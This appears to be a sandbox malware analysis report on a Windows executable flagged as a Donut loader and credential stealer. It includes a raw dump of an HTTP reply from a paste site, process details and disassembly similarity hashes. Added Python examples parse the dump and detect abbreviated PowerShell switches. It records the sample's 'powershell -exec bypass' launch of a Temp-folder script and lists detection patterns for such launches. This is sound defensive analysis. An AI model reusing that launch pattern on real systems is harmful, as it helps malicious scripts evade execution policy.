                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 9091ed731f6d0cbc-EWR
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1669&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=810&delivery_rate=1731909&cwnd=184&unsent_bytes=0&cid=7e756fa19c397caa&ts=268&x=0"
                                                                                                                                                2025-01-28 15:13:37 UTC465INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                                                                                Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                                                                                2025-01-28 15:13:37 UTC1369INData Raw: 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65
                                                                                                                                                Data Ascii: , custom urls and editing." /> <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta prope
                                                                                                                                                2025-01-28 15:13:37 UTC1369INData Raw: 22 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 22 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e
                                                                                                                                                Data Ascii: "(prefers-color-scheme: dark)").matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.
                                                                                                                                                2025-01-28 15:13:37 UTC1257INData Raw: 22 64 61 72 6b 4d 6f 64 65 42 74 6e 22 20 74 69 74 6c 65 3d 22 44 61 72 6b 2f 6c 69 67 68 74 20 6d 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69
                                                                                                                                                Data Ascii: "darkModeBtn" title="Dark/light mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.mi
                                                                                                                                                2025-01-28 15:13:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0
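The rows above are the sandbox's packet dump of the rentry.co reply: each row is a timestamp, the declared byte count, the direction (IN) and the raw bytes, and the body is sent chunked (the first row starts with the chunk-size line "1164", the last row is the terminating "0" chunk). The report cuts long rows, so a row whose column says 1369 bytes shows only 256 of them, and a body rebuilt from such rows is torn. The following is an added example, not Joe Sandbox code and not part of the original report: it parses rows in that layout, counts the bytes the dump omits, decodes the chunked body only when nothing is missing, and pulls the page title out. The two dumps it runs on are constructed fixtures in the same row format (one complete, one truncated the way the report truncates), not bytes copied from the capture.

```python
"""Rebuild a chunked HTTP body from Joe Sandbox 'Data Raw' rows.

Row layout, as printed in the report (columns run together):
    2025-01-28 15:13:37 UTC465INData Raw: 31 31 36 34 0d 0a ...
The declared length (465) is compared with the number of bytes actually
printed so a truncated row is reported instead of silently decoded.
"""
import re

ROW_RE = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\s*UTC\s*(\d+)\s*(IN|OUT)\s*Data Raw:\s*([0-9a-fA-F ]*)$")


def parse_rows(dump):
    """Yield (timestamp, direction, declared_len, data, missing) per row.
    'missing' is declared_len minus the bytes printed; > 0 means the row is torn."""
    for line in dump.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        ts, declared, direction, hexs = m.groups()
        data = bytes.fromhex(hexs)
        yield ts, direction, int(declared), data, int(declared) - len(data)


def reassemble(dump, direction="IN"):
    """Concatenate the rows of one direction; return (stream, total_missing_bytes)."""
    stream, missing = bytearray(), 0
    for _, d, _, data, gap in parse_rows(dump):
        if d == direction:
            stream += data
            missing += gap
    return bytes(stream), missing


def dechunk(body):
    """Decode a Transfer-Encoding: chunked body; raise ValueError if the stream is torn."""
    out, pos = bytearray(), 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("no chunk-size line at offset %d (stream torn)" % pos)
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)                      # terminating chunk; trailers ignored
        chunk = body[pos:pos + size]
        if len(chunk) < size:
            raise ValueError("chunk of %d bytes cut short at offset %d" % (size, pos))
        out += chunk
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk at offset %d" % pos)
        pos += 2


def response_title(dump):
    """Decode the IN stream of a dump and return {'title', 'missing', 'error'}."""
    body, missing = reassemble(dump)
    if missing:
        return {"title": None, "missing": missing, "error": "dump truncated; body not decoded"}
    try:
        html = dechunk(body)
    except ValueError as exc:
        return {"title": None, "missing": 0, "error": str(exc)}
    m = re.search(rb"<title>(.*?)</title>", html, re.S)
    return {"title": m.group(1).decode() if m else None, "missing": 0, "error": None}


# ---- constructed fixtures (not bytes from the report) ----------------------
HTML = (b"<!DOCTYPE html>\n<html><head><meta charset=\"utf-8\">\n"
        b"<title>Error</title></head><body>Not found</body></html>\n")
CHUNKED = ("%x\r\n" % len(HTML)).encode() + HTML + b"\r\n" + b"0\r\n\r\n"
TS = "2025-01-28 15:13:37"


def row(direction, data, declared=None):
    """Render one row in the report's layout; 'declared' lets a row claim more bytes than it shows."""
    declared = len(data) if declared is None else declared
    return "%s UTC%d%sData Raw: %s" % (TS, declared, direction, data.hex(" "))


COMPLETE_DUMP = "\n".join([row("IN", CHUNKED[:40]), row("IN", CHUNKED[40:])])
# Second row claims the full remainder but prints only 32 bytes, like the 1369/256 rows above.
TORN_DUMP = "\n".join([row("IN", CHUNKED[:40]),
                       row("IN", CHUNKED[40:72], declared=len(CHUNKED) - 40)])

if __name__ == "__main__":
    print(response_title(COMPLETE_DUMP))
    print(response_title(TORN_DUMP))
```

On the page's own rows the torn path is the one that fires: the declared lengths add up to far more than the bytes printed, so the title can only be read from the Data Ascii preview, not from a decoded body.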



                                                                                                                                                Target ID:0
                                                                                                                                                Start time:10:12:08
                                                                                                                                                Start date:28/01/2025
                                                                                                                                                Path:C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'730'416 bytes
                                                                                                                                                MD5 hash:C6107E0D217C3CE4F5D8C6198622556B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1908607385.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:10:13:36
                                                                                                                                                Start date:28/01/2025
                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1"
                                                                                                                                                Imagebase:0xdc0000
                                                                                                                                                File size:433'152 bytes
                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true
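Process 7 is the launch behind the two Sigma hits listed at the top of the report (Suspicious PowerShell Parameter Substring, Suspicious Script Execution From Temp Folder): powershell.exe is started with "-exec bypass" and a script under AppData\Local\Temp. A rule that looks for the literal "-ExecutionPolicy Bypass" misses this, because powershell.exe accepts any unambiguous prefix of a switch name ("-ex", "-exec") plus a few fixed aliases ("-ep"). The following is an added example, not the Sigma rules and not Joe Sandbox code: it resolves the typed switch to its canonical name before checking the value, so the abbreviated forms are caught. The prefix table reflects the shortest forms powershell.exe's switch matching accepts; the command line from process 7 is taken from this report, the other two command lines are constructed.

```python
"""Flag PowerShell launches like process 7 in this report:
    powershell -exec bypass -f "C:\\Users\\user\\AppData\\Local\\Temp\\KOZ4VON644XMYEN5.ps1"
Findings are produced per command line; nothing is read from a live system."""
import re

# canonical switch name, shortest prefix powershell.exe accepts, explicit aliases
SWITCHES = [
    ("executionpolicy", "ex", {"ep"}),
    ("encodedcommand", "e", {"ec"}),
    ("file", "f", set()),
    ("command", "c", set()),
    ("windowstyle", "w", set()),
    ("noprofile", "nop", set()),
    ("noninteractive", "noni", set()),
]
FLAG_ONLY = {"noprofile", "noninteractive"}           # switches that take no value
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "%temp%")


def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in re.finditer(r'"([^"]*)"|(\S+)', cmdline)]


def resolve_switch(typed):
    """Map '-exec', '/ep', '-F', ... to the canonical switch name, or None."""
    key = typed.lstrip("-/").lower()
    for name, shortest, aliases in SWITCHES:
        if key in aliases or (name.startswith(key) and len(key) >= len(shortest)):
            return name
    return None


def parse_switches(cmdline):
    """Return {canonical: (as_typed, value)}; value is None for flag switches."""
    toks = tokenize(cmdline)
    found, i = {}, 1                                   # toks[0] is the image name
    while i < len(toks):
        tok = toks[i]
        if len(tok) > 1 and tok[0] in "-/":
            name = resolve_switch(tok)
            if name:
                value = None
                if (name not in FLAG_ONLY and i + 1 < len(toks)
                        and toks[i + 1][:1] not in ("-", "/")):
                    value = toks[i + 1]
                    i += 1
                found[name] = (tok, value)
        i += 1
    return found


def analyze(cmdline):
    """Return the list of findings for one process-creation command line."""
    sw = parse_switches(cmdline)
    findings = []
    ep = sw.get("executionpolicy")
    if ep and ep[1] and ep[1].lower() in ("bypass", "unrestricted"):
        findings.append("execution-policy-override")
    script = sw.get("file")
    if script and script[1] and any(d in script[1].lower() for d in TEMP_DIRS):
        findings.append("script-in-temp")
    ws = sw.get("windowstyle")
    if ws and ws[1] and ws[1].lower() == "hidden":
        findings.append("hidden-window")
    if "encodedcommand" in sw:
        findings.append("encoded-command")
    # the "parameter substring" signal: any switch typed in a non-canonical form
    short = [typed for name, (typed, _) in sw.items() if typed.lstrip("-/").lower() != name]
    if short:
        findings.append("abbreviated-switches:" + ",".join(short))
    return findings


# process 7 from this report, then two constructed command lines for contrast
SAMPLE_EVENTS = [
    ("report process 7",
     r'powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1"'),
    ("constructed, benign admin script",
     r'powershell.exe -NoProfile -File C:\Scripts\backup.ps1'),
    ("constructed, hidden encoded command",
     r'powershell -ep Bypass -w hidden -e QQBBAA=='),
]

if __name__ == "__main__":
    for label, cmd in SAMPLE_EVENTS:
        print("%-40s %s" % (label, analyze(cmd) or "clean"))
```

Resolving the switch first also keeps the rule from firing on the full spelling alone: the benign line above uses "-NoProfile -File" and produces no finding, while both abbreviated lines are flagged on the value they carry, not on the spelling of the switch.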

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:10:13:37
                                                                                                                                                Start date:28/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Non-executed Functions

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000003.2246120073.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Offset: 00832000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_3_832000_#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 36ee85feecd927fa95baf7906679419c080237d0ab73474c711f4f18ffa90b7c
                                                                                                                                                • Instruction ID: 1b0f7648f18be8e1e496cb5c4173869f8701c700918e7885e54ed719db80da94
                                                                                                                                                • Opcode Fuzzy Hash: 36ee85feecd927fa95baf7906679419c080237d0ab73474c711f4f18ffa90b7c
                                                                                                                                                • Instruction Fuzzy Hash: 83C1CD6544E3C50FD7178B70496A051BFB0BE63204B1EC6DFC8C98F4A3D359A94AE7A2

                                                                                                                                                Executed Functions

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2265159886.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7790000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ac4a1dbcf99fa88016973b5eb448d014c77eebc6232cdac1f542eff2cb59585f
                                                                                                                                                • Instruction ID: b4535628b79aac8926f958ac5bf63f4f5ee8fe1b4e4405f8e1e62ff112c26146
                                                                                                                                                • Opcode Fuzzy Hash: ac4a1dbcf99fa88016973b5eb448d014c77eebc6232cdac1f542eff2cb59585f
                                                                                                                                                • Instruction Fuzzy Hash: C7124AB1B0534B9FDF119B78A4017AAB7A29FC22A4F54C4BAD505CF251DB32CC52C7A2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2257395610.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_2fd0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 134322068e5eb7708b9372735d47b24a443409cae5c99e33d65c5e163931814f
                                                                                                                                                • Instruction ID: 1badf5999ee6a4f80bc6ada0fee5676deb0e682dc5b862d377ad5f30915d7981
                                                                                                                                                • Opcode Fuzzy Hash: 134322068e5eb7708b9372735d47b24a443409cae5c99e33d65c5e163931814f
                                                                                                                                                • Instruction Fuzzy Hash: B712A170A00245DFCB05CF98C484AAEFBB2FF49314B298599D555EB361C335EC91CBA4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2265159886.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7790000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 0a936922e2aacb2b7fbb690c27c04c41702b796b7cc47df5eef64c33cb24cf45
                                                                                                                                                • Instruction ID: 786f153a450f656c55305075ca7f580fbecb7b317c6a4b5a59a69938fafdbcdf
                                                                                                                                                • Opcode Fuzzy Hash: 0a936922e2aacb2b7fbb690c27c04c41702b796b7cc47df5eef64c33cb24cf45
                                                                                                                                                • Instruction Fuzzy Hash: 05414BF1B0130BDFDF208F68A5017A677A29F812C4B99C5B5D4019F251DB32DD62C7A2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2257395610.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_2fd0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1364a101bb50105434cb1bc38dd459ea33dbbde66df33f0026326c19d21471b1
                                                                                                                                                • Instruction ID: b573f66dca826b193869d51ac41a5a734f4ada7b8ea883c07f784913b3f99a3c
                                                                                                                                                • Opcode Fuzzy Hash: 1364a101bb50105434cb1bc38dd459ea33dbbde66df33f0026326c19d21471b1
                                                                                                                                                • Instruction Fuzzy Hash: A0413974A00205DFDB06CF99C598AAEFBB2FF48354B1585AAD505AB364C732EC50CBA4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2257395610.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_2fd0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a843d41f30223dbad0edf0a84ca106ed72be320c4b6501a29f8b4ab599f3bd0c
                                                                                                                                                • Instruction ID: 1b8c5e79b8bde13232c11f4bd96dc797ad93d06dc37e9a0971aa2612d9d78531
                                                                                                                                                • Opcode Fuzzy Hash: a843d41f30223dbad0edf0a84ca106ed72be320c4b6501a29f8b4ab599f3bd0c
                                                                                                                                                • Instruction Fuzzy Hash: 55213B74E04219DFCB00CF98D884AAABBB1FF89310B158596E919EB352C735ED41CFA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2257395610.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_2fd0000_powershell.jbxd
                                                                                                                                                Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 87e11a7ddf3d379e678d1be89428683c776d66148502878d105f2bb00ffa0bdc
• Instruction ID: 1aa492f32233f79c051d688d4fdab36884ce30c390174248c7db38018c72b210
• Opcode Fuzzy Hash: 87e11a7ddf3d379e678d1be89428683c776d66148502878d105f2bb00ffa0bdc
• Instruction Fuzzy Hash: D9215C74A042599FCB01DF9CD4809AEFBB5FF89310B1584AAE909EB352C331EC41CBA5
Memory Dump Source
• Source File: 00000007.00000002.2256761066.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2eed000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 452f18bbf528311fcf457bd293dbabda0aeec3c1b6abf019d5d5f87d7f8f6256
• Instruction ID: 27f52c232c4007ecb09d90d4a16ff8ec0063c582c4467c59f2f1faea123a0854
• Opcode Fuzzy Hash: 452f18bbf528311fcf457bd293dbabda0aeec3c1b6abf019d5d5f87d7f8f6256
• Instruction Fuzzy Hash: D1014C6100E3C09FD7128B258C94B62BFB8DF43228F1DC1DBD8888F1A3C2695849CB72
Memory Dump Source
• Source File: 00000007.00000002.2256761066.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2eed000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6ddb996924d22d1c6d730678cfd372e2a4456d69a3bc71a76da0050c211c1f1d
• Instruction ID: 5148642e3bda915a07933ab1d4f2550a8fc1bc6fd33805873dc410636158daa6
• Opcode Fuzzy Hash: 6ddb996924d22d1c6d730678cfd372e2a4456d69a3bc71a76da0050c211c1f1d
• Instruction Fuzzy Hash: 4A012631048304AFEB209E21CC80BA7BBDCDF41238F0CD01AED4A4B242C3799881CAB2
Memory Dump Source
• Source File: 00000007.00000002.2257395610.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2fd0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 89affe93dd524a7bc249b15092a42ec99cb2042b1d1ce924d63f336bf6d394a8
• Instruction ID: c53367da4da0401efafd48cf950c329c365911e2625912b2ff41e2e78ad71c38
• Opcode Fuzzy Hash: 89affe93dd524a7bc249b15092a42ec99cb2042b1d1ce924d63f336bf6d394a8
• Instruction Fuzzy Hash: BD01F731A083559FDB02DB98C8A06D9FBB2FF8A310B1A8096C945DB252C731AC95CB95

Non-executed Functions

Strings
Memory Dump Source
• Source File: 00000007.00000002.2265159886.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7790000_powershell.jbxd
Similarity
• API ID:
• String ID: pl$pl$pl$pl
• API String ID: 0-1611185517
• Opcode ID: 83fb9e69c90cec5fee265edfe840e09b31a4cd752a8d7bd34de4d715235c5e30
• Instruction ID: 8f5064e88cd85a08cfd2dc322913079dae3504640443223d4a2ee5b9de9e41ec
• Opcode Fuzzy Hash: 83fb9e69c90cec5fee265edfe840e09b31a4cd752a8d7bd34de4d715235c5e30
• Instruction Fuzzy Hash: BDF139B270520ADFDF159B68A5006AABBF2AFC6250F14C5BAD445CB251DB32CD12C7A1